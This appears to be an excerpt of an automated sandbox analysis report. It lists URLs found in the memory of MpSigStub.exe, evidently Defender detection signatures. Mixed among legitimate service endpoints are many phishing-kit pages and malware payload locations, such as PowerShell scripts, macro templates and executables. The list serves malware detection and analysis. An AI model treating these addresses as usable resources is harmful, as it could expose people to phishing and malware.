Source: MpSigStub.exe, 00000026.00000003.18297254258.00000138BD45F000.00000004.00000001.sdmp	String found in binary or memory: https://traffking.ru/123?utm_term=
Source: MpSigStub.exe, 00000026.00000003.18297254258.00000138BD45F000.00000004.00000001.sdmp	String found in binary or memory: https://traffking.ru/aws?utm_term=
Source: MpSigStub.exe, 00000026.00000003.18323600754.00000138BDB57000.00000004.00000001.sdmp	String found in binary or memory: https://traffking.ru/shook?utm_term=
Source: MpSigStub.exe, 00000026.00000003.18323600754.00000138BDB57000.00000004.00000001.sdmp	String found in binary or memory: https://traffking.ru/strik?utm_term=
Source: MpSigStub.exe, 00000026.00000003.18334733543.00000138BCF14000.00000004.00000001.sdmp	String found in binary or memory: https://transfer.sh/
Source: MpSigStub.exe, 00000026.00000003.18434898565.00000138BE7B6000.00000004.00000001.sdmp	String found in binary or memory: https://transfer.sh/yyaum/svchost.sh
Source: MpSigStub.exe, 00000026.00000003.18297254258.00000138BD45F000.00000004.00000001.sdmp	String found in binary or memory: https://trex-miner.com
Source: MpSigStub.exe, 00000026.00000003.18438264865.00000138BD081000.00000004.00000001.sdmp	String found in binary or memory: https://trinitas.or.id/templates/jakarta/images/addons/msg.jpg
Source: MpSigStub.exe, 00000026.00000003.18293349131.00000138BD896000.00000004.00000001.sdmp	String found in binary or memory: https://ttraff.cc/
Source: MpSigStub.exe, 00000026.00000003.18293349131.00000138BD896000.00000004.00000001.sdmp	String found in binary or memory: https://ttraff.club/
Source: MpSigStub.exe, 00000026.00000003.18293349131.00000138BD896000.00000004.00000001.sdmp	String found in binary or memory: https://ttraff.com/
Source: MpSigStub.exe, 00000026.00000003.18293349131.00000138BD896000.00000004.00000001.sdmp	String found in binary or memory: https://ttraff.link/
Source: MpSigStub.exe, 00000026.00000003.18293349131.00000138BD896000.00000004.00000001.sdmp	String found in binary or memory: https://ttraff.me/
Source: MpSigStub.exe, 00000026.00000003.18293349131.00000138BD896000.00000004.00000001.sdmp	String found in binary or memory: https://ttraff.ru/
Source: MpSigStub.exe, 00000026.00000003.18429655870.00000138BE6F0000.00000004.00000001.sdmp	String found in binary or memory: https://tubestore.com.br/wp-content/p_bn/
Source: MpSigStub.exe, 00000026.00000003.18343624782.00000138BE12C000.00000004.00000001.sdmp	String found in binary or memory: https://tweetperks.com/lbim8w/
Source: MpSigStub.exe, 00000026.00000003.18434898565.00000138BE7B6000.00000004.00000001.sdmp	String found in binary or memory: https://u.lewd.se/
Source: MpSigStub.exe, 00000026.00000003.18317408849.00000138BDA0D000.00000004.00000001.sdmp	String found in binary or memory: https://u.nu/920yx
Source: MpSigStub.exe, 00000026.00000003.18317408849.00000138BDA0D000.00000004.00000001.sdmp	String found in binary or memory: https://u.nu/e6b2i
Source: MpSigStub.exe, 00000026.00000003.18435217053.00000138BD41C000.00000004.00000001.sdmp	String found in binary or memory: https://u.nu/edc63
Source: MpSigStub.exe, 00000026.00000003.18432385873.00000138BDEF2000.00000004.00000001.sdmp	String found in binary or memory: https://u6882561.ct.sendgrid.net/wf/click?upn=o3yy7nxymwp5cpvqnxo3xb8sbgrdkj8vj
Source: MpSigStub.exe, 00000026.00000003.18436729907.00000138BE5E7000.00000004.00000001.sdmp	String found in binary or memory: https://u6947877.ct.sendgrid.net/wf/click?upn=aum5tbbw0s-2boddc9wvl76ffmwkftnihk7jwmiyskchpxyq1lorjb
Source: MpSigStub.exe, 00000026.00000003.18435217053.00000138BD41C000.00000004.00000001.sdmp	String found in binary or memory: https://uaeub.com/ds/161120.gif
Source: MpSigStub.exe, 00000026.00000003.18429216145.00000138BD7FA000.00000004.00000001.sdmp	String found in binary or memory: https://ufile.io/xjsrzal2
Source: MpSigStub.exe, 00000026.00000003.18430871789.00000138BE2D0000.00000004.00000001.sdmp	String found in binary or memory: https://uis.public360online.com:443/biz/v2-pbr/docprod/templates/_uis%20moteinnkalling_referat.docx
Source: MpSigStub.exe, 00000026.00000003.18438264865.00000138BD081000.00000004.00000001.sdmp	String found in binary or memory: https://uniquestyle.dk/wp-content/themes/ifeaturepro5-child/gr.mpwq
Source: MpSigStub.exe, 00000026.00000003.18298490713.00000138BDFB9000.00000004.00000001.sdmp	String found in binary or memory: https://unitedstates1.cp.wd.microsoft.us/WdCpSrvc.asmx
Source: MpSigStub.exe, 00000026.00000003.18298490713.00000138BDFB9000.00000004.00000001.sdmp	String found in binary or memory: https://unitedstates1.cp.wd.microsoft.us/wdcp.svc/bond/submitReport
Source: MpSigStub.exe, 00000026.00000003.18298490713.00000138BDFB9000.00000004.00000001.sdmp	String found in binary or memory: https://unitedstates1.cp.wd.microsoft.us/wdcp.svc/submitReport
Source: MpSigStub.exe, 00000026.00000003.18298490713.00000138BDFB9000.00000004.00000001.sdmp	String found in binary or memory: https://unitedstates2.cp.wd.microsoft.us/WdCpSrvc.asmx
Source: MpSigStub.exe, 00000026.00000003.18298490713.00000138BDFB9000.00000004.00000001.sdmp	String found in binary or memory: https://unitedstates2.cp.wd.microsoft.us/wdcp.svc/bond/submitReport
Source: MpSigStub.exe, 00000026.00000003.18298490713.00000138BDFB9000.00000004.00000001.sdmp	String found in binary or memory: https://unitedstates2.cp.wd.microsoft.us/wdcp.svc/submitReport
Source: MpSigStub.exe, 00000026.00000003.18298490713.00000138BDFB9000.00000004.00000001.sdmp	String found in binary or memory: https://unitedstates4.cp.wd.microsoft.us/WdCpSrvc.asmx
Source: MpSigStub.exe, 00000026.00000003.18298490713.00000138BDFB9000.00000004.00000001.sdmp	String found in binary or memory: https://unitedstates4.cp.wd.microsoft.us/wdcp.svc/bond/submitReport
Source: MpSigStub.exe, 00000026.00000003.18298490713.00000138BDFB9000.00000004.00000001.sdmp	String found in binary or memory: https://unitedstates4.cp.wd.microsoft.us/wdcp.svc/submitReport
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	String found in binary or memory: https://updatesdomainn.ml/
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	String found in binary or memory: https://updatesdomainn.ml/post.php
Source: MpSigStub.exe, 00000026.00000003.18323600754.00000138BDB57000.00000004.00000001.sdmp	String found in binary or memory: https://upload.cat/
Source: MpSigStub.exe, 00000026.00000003.18326492976.00000138BE3E0000.00000004.00000001.sdmp	String found in binary or memory: https://upload.wikimedia.org/wikipedia/commons/
Source: MpSigStub.exe, 00000026.00000003.18433827604.00000138BC9C2000.00000004.00000001.sdmp	String found in binary or memory: https://uploadvirus.com/uploads/
Source: MpSigStub.exe, 00000026.00000003.18323600754.00000138BDB57000.00000004.00000001.sdmp	String found in binary or memory: https://upt.fastsearch.me/
Source: MpSigStub.exe, 00000026.00000003.18355154038.00000138BCFDB000.00000004.00000001.sdmp	String found in binary or memory: https://upurl.me/m7oiv
Source: MpSigStub.exe, 00000026.00000003.18433546699.00000138BC981000.00000004.00000001.sdmp	String found in binary or memory: https://upurl.me/vvkzd
Source: MpSigStub.exe, 00000026.00000003.18312208260.00000138BDE5C000.00000004.00000001.sdmp	String found in binary or memory: https://urbanhomefitness.com/file/excelzz/index.php?email=
Source: MpSigStub.exe, 00000026.00000003.18438856533.00000138BDFB8000.00000004.00000001.sdmp	String found in binary or memory: https://urldefense.proofpoint.com/v2/url?u=http-3a__entreverodomoha.com.br_7_index.php-3f-3f-3fr-3fw
Source: MpSigStub.exe, 00000026.00000003.18329637762.00000138BD6F3000.00000004.00000001.sdmp	String found in binary or memory: https://utilities.pcpitstop.com
Source: MpSigStub.exe, 00000026.00000003.18325199016.00000138BEA60000.00000004.00000001.sdmp	String found in binary or memory: https://vamoss.com.br/blogfolio/wp-content/upgrabe/
Source: MpSigStub.exe, 00000026.00000003.18341846775.00000138BCF56000.00000004.00000001.sdmp	String found in binary or memory: https://vaqww.dyndns.dk/tolly5/
Source: MpSigStub.exe, 00000026.00000003.18350359042.00000138BE7B7000.00000004.00000001.sdmp	String found in binary or memory: https://vaqww.dyndns.dk/tolly5/next.php
Source: MpSigStub.exe, 00000026.00000003.18325199016.00000138BEA60000.00000004.00000001.sdmp	String found in binary or memory: https://vespang.cf/aggreey/post.php
Source: MpSigStub.exe, 00000026.00000003.18436729907.00000138BE5E7000.00000004.00000001.sdmp	String found in binary or memory: https://victoriaparkmazda-my.sharepoint.com/personal/ann_victoriaparkmazda_co_uk/_layouts/15/guestac
Source: MpSigStub.exe, 00000026.00000003.18327109777.00000138BDB15000.00000004.00000001.sdmp	String found in binary or memory: https://vieeewen.org/ddy/next.php
Source: MpSigStub.exe, 00000026.00000003.18327109777.00000138BDB15000.00000004.00000001.sdmp	String found in binary or memory: https://vieeewen.org/tgg/next.php
Source: MpSigStub.exe, 00000026.00000003.18430295296.00000138BEBAA000.00000004.00000001.sdmp	String found in binary or memory: https://viro.mleydier.fr/noauth
Source: MpSigStub.exe, 00000026.00000003.18293349131.00000138BD896000.00000004.00000001.sdmp	String found in binary or memory: https://vm.jt-voicem.club/?e=ckoonce
Source: MpSigStub.exe, 00000026.00000003.18293349131.00000138BD896000.00000004.00000001.sdmp	String found in binary or memory: https://vm.jt-voicem.club/?e=ljeffcoat
Source: MpSigStub.exe, 00000026.00000003.18424475350.00000138BD8C1000.00000004.00000001.sdmp	String found in binary or memory: https://vmnames.ssvoipsx.xyz/?e=%25
Source: MpSigStub.exe, 00000026.00000003.18347059262.00000138BDD2C000.00000004.00000001.sdmp	String found in binary or memory: https://vmnapi.net/vmap/1.0/yhs/ms/yhs/?vmimp=
Source: MpSigStub.exe, 00000026.00000003.18432962909.00000138BE62A000.00000004.00000001.sdmp	String found in binary or memory: https://vn.pr-nijim.xyz/?e=soumu
Source: MpSigStub.exe, 00000026.00000003.18293349131.00000138BD896000.00000004.00000001.sdmp	String found in binary or memory: https://voice.vm-business.online/?e=jscott
Source: MpSigStub.exe, 00000026.00000003.18303257076.00000138BE522000.00000004.00000001.sdmp	String found in binary or memory: https://voicemailss.hozoimn.xyz/?e=twfyawx5bi5kywvja2vslw1peebnyxjhdghvbkvszwn0cmljlmnvbq==
Source: MpSigStub.exe, 00000026.00000003.18306821141.00000138BD516000.00000004.00000001.sdmp	String found in binary or memory: https://voipses.eononass.xyz/?e=%25
Source: MpSigStub.exe, 00000026.00000003.18306821141.00000138BD516000.00000004.00000001.sdmp	String found in binary or memory: https://voipss.snonames.xyz/?e=%25
Source: MpSigStub.exe, 00000026.00000003.18353014898.00000138BD7B9000.00000004.00000001.sdmp	String found in binary or memory: https://vooydvclhlqukhdvrsxe.com/tx.dll
Source: MpSigStub.exe, 00000026.00000003.18435819604.00000138BD5EA000.00000004.00000001.sdmp	String found in binary or memory: https://voyya.com.mx/wp-content/themes/Divi/incl(
Source: MpSigStub.exe, 00000026.00000003.18293349131.00000138BD896000.00000004.00000001.sdmp	String found in binary or memory: https://vp.videomeet.club/?e=
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	String found in binary or memory: https://vr2oq.csb.app/
Source: MpSigStub.exe, 00000026.00000003.18331150591.00000138BD6B1000.00000004.00000001.sdmp	String found in binary or memory: https://vsit.site/
Source: MpSigStub.exe, 00000026.00000003.18339021040.00000138BE6AF000.00000004.00000001.sdmp	String found in binary or memory: https://vsit.site/4a8gk
Source: MpSigStub.exe, 00000026.00000003.18339021040.00000138BE6AF000.00000004.00000001.sdmp	String found in binary or memory: https://vsit.site/ghqec
Source: MpSigStub.exe, 00000026.00000003.18339021040.00000138BE6AF000.00000004.00000001.sdmp	String found in binary or memory: https://vsit.site/xndcx
Source: MpSigStub.exe, 00000026.00000003.18320722145.00000138BD946000.00000004.00000001.sdmp	String found in binary or memory: https://vtsamples.commondatastorage.googleapis.com/
Source: MpSigStub.exe, 00000026.00000003.18314057962.00000138BE8D4000.00000004.00000001.sdmp	String found in binary or memory: https://wac.edgecastcdn.net/800952/5b595c13-aea5-4a6c-a099-d29c4678f6f2-api/gcbs
Source: MpSigStub.exe, 00000026.00000003.18314057962.00000138BE8D4000.00000004.00000001.sdmp	String found in binary or memory: https://wac.edgecastcdn.net/800952/5b595c13-aea5-4a6c-a099-d29c4678f6f2-api/gccs
Source: MpSigStub.exe, 00000026.00000003.18432962909.00000138BE62A000.00000004.00000001.sdmp	String found in binary or memory: https://wacochamber.com/
Source: MpSigStub.exe, 00000026.00000003.18348911082.00000138BD189000.00000004.00000001.sdmp	String found in binary or memory: https://we.tl/t-ccUfUrQOhF
Source: MpSigStub.exe, 00000026.00000003.18349576485.00000138BE313000.00000004.00000001.sdmp	String found in binary or memory: https://web.certicamara.com/marco-legal0Z
Source: MpSigStub.exe, 00000026.00000003.18326492976.00000138BE3E0000.00000004.00000001.sdmp	String found in binary or memory: https://webmailx.space/ml/ama/4/excel/log.php
Source: MpSigStub.exe, 00000026.00000003.18351550928.00000138BCD89000.00000004.00000001.sdmp	String found in binary or memory: https://world-wwt.com/wp-admin/css/colors/coffee/reportexcelnew.php
Source: MpSigStub.exe, 00000026.00000003.18435519768.00000138BD45D000.00000004.00000001.sdmp	String found in binary or memory: https://ws.onehub.com/files/7w1372el
Source: MpSigStub.exe, 00000026.00000003.18354806789.00000138BD41C000.00000004.00000001.sdmp	String found in binary or memory: https://www-cdn.getwebcake.com/
Source: MpSigStub.exe, 00000026.00000003.18430295296.00000138BEBAA000.00000004.00000001.sdmp	String found in binary or memory: https://www.%s.com.br/
Source: MpSigStub.exe, 00000026.00000003.18335030768.00000138BE917000.00000004.00000001.sdmp	String found in binary or memory: https://www.4shared.com/downloadhelper/stat?type=%STATYPE%
Source: MpSigStub.exe, 00000026.00000003.18335030768.00000138BE917000.00000004.00000001.sdmp	String found in binary or memory: https://www.4shared.com/downloadhelper/stat?type=%STATYPE%xc
Source: MpSigStub.exe, 00000026.00000003.18433827604.00000138BC9C2000.00000004.00000001.sdmp	String found in binary or memory: https://www.4shared.com/web/directdownload/plcok719ce/hhnjnm.d9cc6b8210cf7f938818851
Source: MpSigStub.exe, 00000026.00000003.18432962909.00000138BE62A000.00000004.00000001.sdmp	String found in binary or memory: https://www.admos-gleitlager.de/feed/
Source: MpSigStub.exe, 00000026.00000003.18432962909.00000138BE62A000.00000004.00000001.sdmp	String found in binary or memory: https://www.advokathuset.dk/auktioner/tvangsauktioner/saadan-koeber-du-paa-tvangsauktion
Source: MpSigStub.exe, 00000026.00000003.18337788205.00000138BD0C2000.00000004.00000001.sdmp	String found in binary or memory: https://www.aec.com.my/aec_5.5/public/ph/h/page.php
Source: MpSigStub.exe, 00000026.00000003.18432962909.00000138BE62A000.00000004.00000001.sdmp	String found in binary or memory: https://www.anca-aste.it/uploads/form/boeing_spe_leos_logo.jpg
Source: MpSigStub.exe, 00000026.00000003.18341846775.00000138BCF56000.00000004.00000001.sdmp	String found in binary or memory: https://www.anf.es/AC/ACTAS/789230
Source: MpSigStub.exe, 00000026.00000003.18341846775.00000138BCF56000.00000004.00000001.sdmp	String found in binary or memory: https://www.anf.es/AC/ANFServerCA.crl0
Source: MpSigStub.exe, 00000026.00000003.18341846775.00000138BCF56000.00000004.00000001.sdmp	String found in binary or memory: https://www.anf.es/address/)1(0&
Source: MpSigStub.exe, 00000026.00000003.18347059262.00000138BDD2C000.00000004.00000001.sdmp	String found in binary or memory: https://www.anthonyshandyman.com/irn/toolzlord.php
Source: MpSigStub.exe, 00000026.00000003.18254559214.00000138ADCEB000.00000004.00000001.sdmp	String found in binary or memory: https://www.apple.com/appleca/0
Source: MpSigStub.exe, 00000026.00000003.18438264865.00000138BD081000.00000004.00000001.sdmp	String found in binary or memory: https://www.arm-mn.com/wp-content/themes/bb-theme/classes/msg.jpg
Source: MpSigStub.exe, 00000026.00000003.18433827604.00000138BC9C2000.00000004.00000001.sdmp	String found in binary or memory: https://www.astedams.it/uploads/frame/61.dotm
Source: MpSigStub.exe, 00000026.00000003.18433827604.00000138BC9C2000.00000004.00000001.sdmp	String found in binary or memory: https://www.astedams.it/uploads/template/17.dotm
Source: MpSigStub.exe, 00000026.00000003.18432962909.00000138BE62A000.00000004.00000001.sdmp	String found in binary or memory: https://www.augenta.com/site/xmlrpc.php
Source: MpSigStub.exe, 00000026.00000003.18432962909.00000138BE62A000.00000004.00000001.sdmp	String found in binary or memory: https://www.autopfand24.de/pfandhaus-in-meiner-naehe/
Source: MpSigStub.exe, 00000026.00000003.18436729907.00000138BE5E7000.00000004.00000001.sdmp	String found in binary or memory: https://www.bancanetempresarial.banamex
Source: MpSigStub.exe, 00000026.00000003.18306892097.00000138BD524000.00000004.00000001.sdmp, MpSigStub.exe, 00000026.00000003.18429655870.00000138BE6F0000.00000004.00000001.sdmp	String found in binary or memory: https://www.bitly.com/
Source: MpSigStub.exe, 00000026.00000003.18430579741.00000138BEBEB000.00000004.00000001.sdmp	String found in binary or memory: https://www.bitly.com/ad
Source: MpSigStub.exe, 00000026.00000003.18433827604.00000138BC9C2000.00000004.00000001.sdmp	String found in binary or memory: https://www.bitly.com/bug41
Source: MpSigStub.exe, 00000026.00000003.18333799062.00000138BDC1C000.00000004.00000001.sdmp	String found in binary or memory: https://www.bizsonet.com/wp-admin/js/jquery
Source: MpSigStub.exe, 00000026.00000003.18432962909.00000138BE62A000.00000004.00000001.sdmp	String found in binary or memory: https://www.botanicinnovations.com/wp-admin/admin-ajax.php
Source: MpSigStub.exe, 00000026.00000003.18432962909.00000138BE62A000.00000004.00000001.sdmp	String found in binary or memory: https://www.brawnmediany.com
Source: MpSigStub.exe, 00000026.00000003.18432962909.00000138BE62A000.00000004.00000001.sdmp	String found in binary or memory: https://www.cactusthebrand.com/xmlrpc.php
Source: MpSigStub.exe, 00000026.00000003.18318003902.00000138BD399000.00000004.00000001.sdmp	String found in binary or memory: https://www.ccleaner.com/inapp/installerofferpage
Source: MpSigStub.exe, 00000026.00000003.18430579741.00000138BEBEB000.00000004.00000001.sdmp	String found in binary or memory: https://www.cipnet.cl/wp-content/godd/godaddy-rd18/next.php
Source: MpSigStub.exe, 00000026.00000003.18432962909.00000138BE62A000.00000004.00000001.sdmp	String found in binary or memory: https://www.coastalbridgeadvisors.com
Source: MpSigStub.exe, 00000026.00000003.18333202472.00000138BCD05000.00000004.00000001.sdmp	String found in binary or memory: https://www.cogmobile.com/next1.php
Source: MpSigStub.exe, 00000026.00000003.18347059262.00000138BDD2C000.00000004.00000001.sdmp	String found in binary or memory: https://www.coinblind.com/lib/coinblind_beta.js
Source: MpSigStub.exe, 00000026.00000003.18432962909.00000138BE62A000.00000004.00000001.sdmp	String found in binary or memory: https://www.creamery201.com/
Source: MpSigStub.exe, 00000026.00000003.18311122933.00000138BC9C2000.00000004.00000001.sdmp	String found in binary or memory: https://www.dfib.net/calc.exe
Source: MpSigStub.exe, 00000026.00000003.18356361607.00000138BDCE3000.00000004.00000001.sdmp	String found in binary or memory: https://www.digicert.com/CPS0
Source: MpSigStub.exe, 00000026.00000003.18438264865.00000138BD081000.00000004.00000001.sdmp	String found in binary or memory: https://www.divera.nl/wp-content/themes/flexfit/framework/css/font/gr
Source: MpSigStub.exe, 00000026.00000003.18317408849.00000138BDA0D000.00000004.00000001.sdmp	String found in binary or memory: https://www.doganturan.av.tr/wp-admin/alu/reportdhlnew2.php
Source: MpSigStub.exe, 00000026.00000003.18329938261.00000138BD734000.00000004.00000001.sdmp	String found in binary or memory: https://www.doganturan.av.tr/wp-admin/bigi/reportdhlnew2.php
Source: MpSigStub.exe, 00000026.00000003.18438557231.00000138BD0C2000.00000004.00000001.sdmp	String found in binary or memory: https://www.doganturan.av.tr/wp-admin/pa/reportdhlnew2.php
Source: MpSigStub.exe, 00000026.00000003.18438557231.00000138BD0C2000.00000004.00000001.sdmp	String found in binary or memory: https://www.domkara.com.au/fonts/font-awesome/fonts/reportexcelnew.php
Source: MpSigStub.exe, 00000026.00000003.18438557231.00000138BD0C2000.00000004.00000001.sdmp	String found in binary or memory: https://www.domkara.com.au/revolution/css/reportexcelnew.php
Source: MpSigStub.exe, 00000026.00000003.18325199016.00000138BEA60000.00000004.00000001.sdmp	String found in binary or memory: https://www.dropbox.com/
Source: MpSigStub.exe, 00000026.00000003.18437035378.00000138BDFFA000.00000004.00000001.sdmp	String found in binary or memory: https://www.dropbox.com/s/
Source: MpSigStub.exe, 00000026.00000003.18333799062.00000138BDC1C000.00000004.00000001.sdmp	String found in binary or memory: https://www.dropbox.com/s/41zf98knyy5atko/001_01.ps1?dl
Source: MpSigStub.exe, 00000026.00000003.18333799062.00000138BDC1C000.00000004.00000001.sdmp	String found in binary or memory: https://www.dropbox.com/s/dh8flnrogfq1h1w/001.ps1?dl
Source: MpSigStub.exe, 00000026.00000003.18433827604.00000138BC9C2000.00000004.00000001.sdmp	String found in binary or memory: https://www.dropbox.com/s/dmprbq9mxwylpht/zs437zfig68f.doc?dl=1
Source: MpSigStub.exe, 00000026.00000003.18434898565.00000138BE7B6000.00000004.00000001.sdmp	String found in binary or memory: https://www.dropbox.com/s/foughx315flj51u/worddata.dotm?dl=1
Source: MpSigStub.exe, 00000026.00000003.18351550928.00000138BCD89000.00000004.00000001.sdmp	String found in binary or memory: https://www.dropbox.com/s/jxfyg8a6oj13z7i/factuur%20006643-89845.zip
Source: MpSigStub.exe, 00000026.00000003.18432962909.00000138BE62A000.00000004.00000001.sdmp	String found in binary or memory: https://www.dropbox.com/s/r9xrl3meju6lr19/payment_advice.uue?dl=1)
Source: MpSigStub.exe, 00000026.00000003.18305972562.00000138BCED3000.00000004.00000001.sdmp	String found in binary or memory: https://www.e-gold.com
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	String found in binary or memory: https://www.e-gold.com/
Source: MpSigStub.exe, 00000026.00000003.18333419968.00000138BCD37000.00000004.00000001.sdmp	String found in binary or memory: https://www.e-gold.com/acct/
Source: MpSigStub.exe, 00000026.00000003.18305972562.00000138BCED3000.00000004.00000001.sdmp	String found in binary or memory: https://www.e-gold.com/acct/accountinfo.asp
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	String found in binary or memory: https://www.e-gold.com/acct/ai.asp?c=AS
Source: MpSigStub.exe, 00000026.00000003.18305972562.00000138BCED3000.00000004.00000001.sdmp	String found in binary or memory: https://www.e-gold.com/acct/verify.asp
Source: MpSigStub.exe, 00000026.00000003.18305972562.00000138BCED3000.00000004.00000001.sdmp	String found in binary or memory: https://www.e-gold.com/acct/verify.asp&BAction=
Source: MpSigStub.exe, 00000026.00000003.18351550928.00000138BCD89000.00000004.00000001.sdmp	String found in binary or memory: https://www.econoticias.com.bo/aa/excel.php
Source: MpSigStub.exe, 00000026.00000003.18351550928.00000138BCD89000.00000004.00000001.sdmp	String found in binary or memory: https://www.econoticias.com.bo/bb/excel.php
Source: MpSigStub.exe, 00000026.00000003.18351550928.00000138BCD89000.00000004.00000001.sdmp	String found in binary or memory: https://www.econoticias.com.bo/cc/excel.php
Source: MpSigStub.exe, 00000026.00000003.18344712542.00000138BD9CA000.00000004.00000001.sdmp	String found in binary or memory: https://www.elcom.admin.ch
Source: MpSigStub.exe, 00000026.00000003.18424475350.00000138BD8C1000.00000004.00000001.sdmp	String found in binary or memory: https://www.emergencydentistlondonpro.co.uk/hddu2vgb7muait.php
Source: MpSigStub.exe, 00000026.00000003.18432962909.00000138BE62A000.00000004.00000001.sdmp	String found in binary or memory: https://www.escrowprotects.com/share
Source: MpSigStub.exe, 00000026.00000003.18309610141.00000138BE5A6000.00000004.00000001.sdmp	String found in binary or memory: https://www.exploit-db.com/exploits/39719/
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	String found in binary or memory: https://www.fabianiarte.com/uploads/imgup/
Source: MpSigStub.exe, 00000026.00000003.18293843088.00000138BC981000.00000004.00000001.sdmp, MpSigStub.exe, 00000026.00000003.18338078941.00000138BD104000.00000004.00000001.sdmp	String found in binary or memory: https://www.fastsupport.com
Source: MpSigStub.exe, 00000026.00000003.18433249672.00000138BE66B000.00000004.00000001.sdmp	String found in binary or memory: https://www.fastsupport.com/
Source: MpSigStub.exe, 00000026.00000003.18303554710.00000138BE851000.00000004.00000001.sdmp	String found in binary or memory: https://www.finance-portal.basf.net/portal
Source: MpSigStub.exe, 00000026.00000003.18432962909.00000138BE62A000.00000004.00000001.sdmp	String found in binary or memory: https://www.fotoideaymedia.es/wp-content/themes/fotoideaymedia2017/css/reset.css
Source: MpSigStub.exe, 00000026.00000003.18327835238.00000138BDC5F000.00000004.00000001.sdmp	String found in binary or memory: https://www.freecontent.bid./cpcu.js
Source: MpSigStub.exe, 00000026.00000003.18438557231.00000138BD0C2000.00000004.00000001.sdmp	String found in binary or memory: https://www.giftsack.co.uk/wp-includes/pomo/reportdhlnew.php
Source: MpSigStub.exe, 00000026.00000003.18438557231.00000138BD0C2000.00000004.00000001.sdmp	String found in binary or memory: https://www.globalp.com.br/wp-includes/fonts/report-maerskline.php
Source: MpSigStub.exe, 00000026.00000003.18317720831.00000138BDA90000.00000004.00000001.sdmp	String found in binary or memory: https://www.google-analytics.com/j/collect.
Source: MpSigStub.exe, 00000026.00000003.18327835238.00000138BDC5F000.00000004.00000001.sdmp	String found in binary or memory: https://www.google.com
Source: MpSigStub.exe, 00000026.00000003.18430007878.00000138BEA1E000.00000004.00000001.sdmp	String found in binary or memory: https://www.google.com.tr/
Source: MpSigStub.exe, 00000026.00000003.18430007878.00000138BEA1E000.00000004.00000001.sdmp	String found in binary or memory: https://www.google.com/
Source: MpSigStub.exe, 00000026.00000003.18313135929.00000138BE99B000.00000004.00000001.sdmp	String found in binary or memory: https://www.google.com/accounts/servicelogin
Source: MpSigStub.exe, 00000026.00000003.18322967354.00000138BCA81000.00000004.00000001.sdmp	String found in binary or memory: https://www.gottalife.net/wp-content/plugins/seo_index/evt8tkbsidbqf.php
Source: MpSigStub.exe, 00000026.00000003.18424475350.00000138BD8C1000.00000004.00000001.sdmp	String found in binary or memory: https://www.gqtoronto.com/live/excelzz/index.php?email=
Source: MpSigStub.exe, 00000026.00000003.18435819604.00000138BD5EA000.00000004.00000001.sdmp	String found in binary or memory: https://www.gynfit2019.com.br/fotos.jpg
Source: MpSigStub.exe, 00000026.00000003.18327835238.00000138BDC5F000.00000004.00000001.sdmp	String found in binary or memory: https://www.hashing.win/scripts/min.js
Source: MpSigStub.exe, 00000026.00000003.18333799062.00000138BDC1C000.00000004.00000001.sdmp	String found in binary or memory: https://www.hashing.win/t5s0.js
Source: MpSigStub.exe, 00000026.00000003.18436729907.00000138BE5E7000.00000004.00000001.sdmp	String found in binary or memory: https://www.horizon-sun.com/po/mailbox/rectify/sys-admin-9-0-4-7/repair-00-4/1159.php
Source: MpSigStub.exe, 00000026.00000003.18431738263.00000138BE1C7000.00000004.00000001.sdmp	String found in binary or memory: https://www.icq.com/people/
Source: MpSigStub.exe, 00000026.00000003.18333202472.00000138BCD05000.00000004.00000001.sdmp	String found in binary or memory: https://www.ijsiodjfo.ml/index.php?user=
Source: MpSigStub.exe, 00000026.00000003.18351550928.00000138BCD89000.00000004.00000001.sdmp	String found in binary or memory: https://www.ijtra.com/pear/docs/structures_graph/docs/html/media/tito/po.htm
Source: MpSigStub.exe, 00000026.00000003.18437035378.00000138BDFFA000.00000004.00000001.sdmp	String found in binary or memory: https://www.instagram.com/
Source: MpSigStub.exe, 00000026.00000003.18348911082.00000138BD189000.00000004.00000001.sdmp	String found in binary or memory: https://www.kbtseafood.com/wp-content/uploads/2019/07/JTGUJRDPX.res
Source: MpSigStub.exe, 00000026.00000003.18436729907.00000138BE5E7000.00000004.00000001.sdmp	String found in binary or memory: https://www.listrikindo.com/templates/vinye/wp-content/themes/jamo/order1.doc
Source: MpSigStub.exe, 00000026.00000003.18318003902.00000138BD399000.00000004.00000001.sdmp	String found in binary or memory: https://www.llotytue.gq/index.php?user=
Source: MpSigStub.exe, 00000026.00000003.18438264865.00000138BD081000.00000004.00000001.sdmp	String found in binary or memory: https://www.luongynhiem.com/wp-content/themes/sahifa/js/msg.jpg
Source: MpSigStub.exe, 00000026.00000003.18331150591.00000138BD6B1000.00000004.00000001.sdmp	String found in binary or memory: https://www.maan2u.com/alls.txt
Source: MpSigStub.exe, 00000026.00000003.18326445165.00000138BE3D9000.00000004.00000001.sdmp	String found in binary or memory: https://www.managuytakayama.com/purchases
Source: MpSigStub.exe, 00000026.00000003.18437035378.00000138BDFFA000.00000004.00000001.sdmp	String found in binary or memory: https://www.marriott.com
Source: MpSigStub.exe, 00000026.00000003.18435217053.00000138BD41C000.00000004.00000001.sdmp	String found in binary or memory: https://www.monconcept-renovation.fr/wp-admin/network/msci.exe
Source: MpSigStub.exe, 00000026.00000003.18424475350.00000138BD8C1000.00000004.00000001.sdmp	String found in binary or memory: https://www.moverandpackermvp.com/hindustan/scan/
Source: MpSigStub.exe, 00000026.00000003.18432962909.00000138BE62A000.00000004.00000001.sdmp	String found in binary or memory: https://www.nachhilfe-unterricht.com/wp-content/cache/autoptimize/css/autoptimize_018281502668e27604
Source: MpSigStub.exe, 00000026.00000003.18430871789.00000138BE2D0000.00000004.00000001.sdmp	String found in binary or memory: https://www.ne-ba.org/files/gallery/images/bae_ecs_epm.jpg
Source: MpSigStub.exe, 00000026.00000003.18436729907.00000138BE5E7000.00000004.00000001.sdmp	String found in binary or memory: https://www.nextrecruitment.ro//pdd/sfexpress/index.php?email=hiroyuki.ume.zh
Source: MpSigStub.exe, 00000026.00000003.18434572336.00000138BE6AE000.00000004.00000001.sdmp	String found in binary or memory: https://www.notion.so/ce3baa2cd5ec4f4eab00575f5ae423e8
